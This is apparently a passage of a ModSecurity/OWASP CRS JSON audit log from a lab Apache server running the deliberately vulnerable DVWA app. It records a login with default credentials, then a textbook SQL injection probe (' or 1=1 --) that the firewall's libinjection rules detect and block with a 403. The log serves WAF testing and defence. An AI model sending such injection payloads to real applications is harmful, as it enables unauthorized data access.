[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUWH8AAQEAABwQSCwAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":426,"p2":1482,"p3":57,"p4":147,"p5":79,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSC0AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"700","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdUWH8AAQEAABwQSC0AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":591,"p2":1781,"p3":120,"p4":440,"p5":92,"sr":22,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:46 --0400","transaction_id":"WRdUWn8AAQEAABwQSC4AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=d0d07c67e4897ee73431149640762432"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdUWn8AAQEAABwQSC4AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":526,"p2":3096,"p3":110,"p4":161,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:46 --0400","transaction_id":"WRdUWn8AAQEAABwQSC8AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=93","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRdUWn8AAQEAABwQSC8AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":602,"p2":2092,"p3":113,"p4":643,"p5":83,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:48 --0400","transaction_id":"WRdUXH8AAQEAABwQSDAAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=92","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXH8AAQEAABwQSDAAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":385,"p2":1895,"p3":96,"p4":507,"p5":80,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:48 --0400","transaction_id":"WRdUXH8AAQEAABwQSDEAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=91","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXH8AAQEAABwQSDEAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":386,"p2":1579,"p3":87,"p4":365,"p5":94,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:50 --0400","transaction_id":"WRdUXn8AAQEAABwQSDIAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=90","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUXn8AAQEAABwQSDIAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":578,"p2":4794,"p3":0,"p4":0,"p5":211,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIEAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 18:40:54 GMT","If-None-Match":"\"295-54f6c29741bca\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:45:58 GMT","ETag":"\"295-54f6c3b9c674a\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
